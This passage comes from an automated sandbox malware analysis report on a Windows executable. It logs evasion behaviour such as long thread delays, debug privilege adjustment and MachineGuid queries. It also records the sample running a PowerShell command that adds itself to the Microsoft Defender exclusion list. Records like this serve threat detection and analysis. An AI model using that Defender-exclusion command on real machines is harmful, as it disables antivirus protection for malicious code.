                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    Source: Yara match | File source: Process Memory Space: 299371485_14108825808_1736351479899.exe PID: 4876, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Memory allocated: D60000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Memory allocated: 2760000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Memory allocated: 2550000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Memory allocated: 76B0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Memory allocated: 6DD0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Memory allocated: 86B0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Memory allocated: 96B0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Memory allocated: 9BB0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Memory allocated: ABB0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Memory allocated: BBB0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Memory allocated: 1590000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Memory allocated: 3070000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Memory allocated: 1720000 memory reserve | memory write watch
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 600000
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 599875
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 599762
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 599656
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 599546
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 599437
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 599328
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 599218
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 599109
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 599000
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 598890
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 598781
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 598672
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 598562
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 598453
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 598343
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 598234
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 598124
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 598015
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 597905
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 597796
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 597687
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 597577
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 597468
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 597358
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 597250
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 597140
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 597031
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 596922
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 596812
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 596703
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 596593
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 596484
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 596375
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 596265
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 596156
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 596047
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 595937
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 595827
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 595718
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 595609
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 595500
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 595390
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 595281
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 595172
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 595062
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 594952
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 594843
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 594734
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Thread delayed: delay time: 594625
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Window / User API: threadDelayed 5114
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Window / User API: threadDelayed 4875
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6764
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2916
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Window / User API: threadDelayed 2320
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Window / User API: threadDelayed 7539
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Window / User API: foregroundWindowGot 1727
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6944 | Thread sleep time: -10145709240540247s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -24903104499507879s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -600000s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 5660 | Thread sleep count: 2320 > 30
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -599875s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 5660 | Thread sleep count: 7539 > 30
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -599762s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -599656s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -599546s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -599437s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -599328s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -599218s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -599109s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -599000s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -598890s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -598781s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -598672s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -598562s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -598453s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -598343s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -598234s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -598124s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -598015s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -597905s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -597796s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -597687s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -597577s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -597468s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -597358s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -597250s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -597140s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -597031s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -596922s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -596812s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -596703s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -596593s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -596484s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -596375s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -596265s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -596156s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -596047s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -595937s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -595827s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -595718s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -595609s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -595500s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -595390s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -595281s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -595172s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -595062s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -594952s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -594843s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -594734s >= -30000s
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908 | Thread sleep time: -594625s >= -30000s
                    Source: 299371485_14108825808_1736351479899.exe, 00000000.00000002.2219355172.0000000003FC1000.00000004.00000800.00020000.00000000.sdmp, 299371485_14108825808_1736351479899.exe, 00000000.00000002.2224357867.0000000009B20000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: rLQeMuOpO6
                    Source: 299371485_14108825808_1736351479899.exe, 00000006.00000002.4617512203.0000000001339000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe"
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe"
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe"
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Process created: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe"
Source: 299371485_14108825808_1736351479899.exe, 00000006.00000002.4622133854.0000000003127000.00000004.00000800.00020000.00000000.sdmp, 299371485_14108825808_1736351479899.exe, 00000006.00000002.4622133854.0000000003171000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program ManagerLR
Source: 299371485_14108825808_1736351479899.exe, 00000006.00000002.4622133854.0000000003127000.00000004.00000800.00020000.00000000.sdmp, 299371485_14108825808_1736351479899.exe, 00000006.00000002.4622133854.0000000003171000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Queries volume information: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe VolumeInformation
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Queries volume information: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe VolumeInformation
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

